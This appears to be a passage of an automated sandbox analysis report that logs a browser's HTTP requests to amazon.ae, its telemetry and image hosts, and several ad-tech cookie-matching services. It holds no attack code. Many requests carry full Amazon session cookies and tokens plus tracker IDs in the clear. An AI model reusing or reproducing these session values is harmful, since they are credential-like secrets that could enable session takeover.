fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26ctb%3D1%26sc0%3Daui%3Asw%3Actrl_changed%26bb0%3D71%26pc0%3D13061%26ld0%3D13061%26t0%3D1723729107575%26csmtags%3Daui%3Asw%3Actrl_changed%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:13061 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D15073%26at%3D15073%26t%3D1723729109587%26csmtags%3DbrowserQuiteMut%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15073 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /rd?url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dweborama%26id%3D%7BWEBO_ENC_CID%7D HTTP/1.1Host: rd.frontend.weborama.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /t/v2?tagid=V2_393725&AMAZON_REGION_SPECIFIC_ENDPOINT=aax-eu.amazon-adsystem.com/s&src.visitorID=IORp_6qgRLaPhnBlGk_r3A HTTP/1.1Host: odr.mookie1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /hz/rhf?currentPageType=i18n-preferences-web&currentSubPageType=subSelectPreferences&excludeAsin=&fieldKeywords=&k=&keywords=&search=&auditEnabled=&previewCampaigns=&forceWidgets=&searchAlias=&cardJSPresent=true HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY; csm-hit=tb:s-B82A0YC1SM3B4A82DCGS|1723729108092&t:1723729109093&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /cross_border_interstitial_sp/render HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY; csm-hit=tb:s-B82A0YC1SM3B4A82DCGS|1723729108092&t:1723729109093&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /v1/get_user_agent_id?dom_token=amazon-eu-23&gdpr_consent= HTTP/1.1Host: cookie-matching.mediarithmics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26ctb%3D1%26m%3D1%26sc%3DB82A0YC1SM3B4A82DCGS%26pc%3D4285%26at%3D4285%26t%3D1723729112265%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26ui%3D2%26lob%3D1:4285 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /pixel?google_nid=a9eu&google_cm&ex=doubleclick.net&gdpr_consent= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26csmtags%3DendVL%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15082 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%2Fa9%3Fentity%3D188%26code%3Dyzz1lUhzR0mqhMyLk0ySdw%26redir%3Dhttps%253A%252F%252Faax-eu.amazon-adsystem.com%252Fs%252Fecm3%253Fex%253DxandrHMT%2526id%253D%2524UID%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=yu-uaTSEs_ytshNPAhe9Ql1eAke5p-exDv5p4qQCG6dY4dUQp0klz7F4PL4BCNjM4Xb20OclYTn_2wh3KSbts7i02szQu1mONFLGrWELEvo.; receive-cookie-deprecation=1; uuid2=5668533296459418706
    Source: global trafficHTTP traffic detected: GET /ul_cb/match?publisher_dsp_id=416&external_user_id=hOua8zJSTCWryW2WkZmIJQ&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DimprovedigitalHMT%26id%3D%7BPUB_USER_ID%7D&gdpr_consent= HTTP/1.1Host: match.360yield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tuuid=56850dde-f521-4220-b5ea-d074c8f18e01; tuuid_lu=1723729113
    Source: global trafficHTTP traffic detected: GET /sync/init/amazon?redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Daudex.com%26id%3D%25s HTTP/1.1Host: audex.userreport.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71JdlF7JKIL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61ZZd5V2wJL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Asi%26si%3D3525%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15082 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D3525%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15082 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /Serving?cn=cs&rtu=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dsizmek%26id%3D%5B%25tp_UserID%25%5D HTTP/1.1Host: bs.serving-sys.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/91+aaxyLapL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71PpuvUNQ4L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61za6jnk1GL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61zol3DlpeL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D952%26pc%3D1462%26at%3D1462%26t%3D1723729109442%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:1461 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/I/31NQAEzynfL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rd?url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dweborama%26id%3D%7BWEBO_ENC_CID%7D&bounce=1&random=886211189 HTTP/1.1Host: rd.frontend.weborama.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AFFICHE_W=8exOFodXoWHx57
    Source: global trafficHTTP traffic detected: GET /rd?url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dweborama%26id%3D%7BWEBO_ENC_CID%7D HTTP/1.1Host: rd.frontend.weborama.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AFFICHE_W=8exOFodXoWHx57
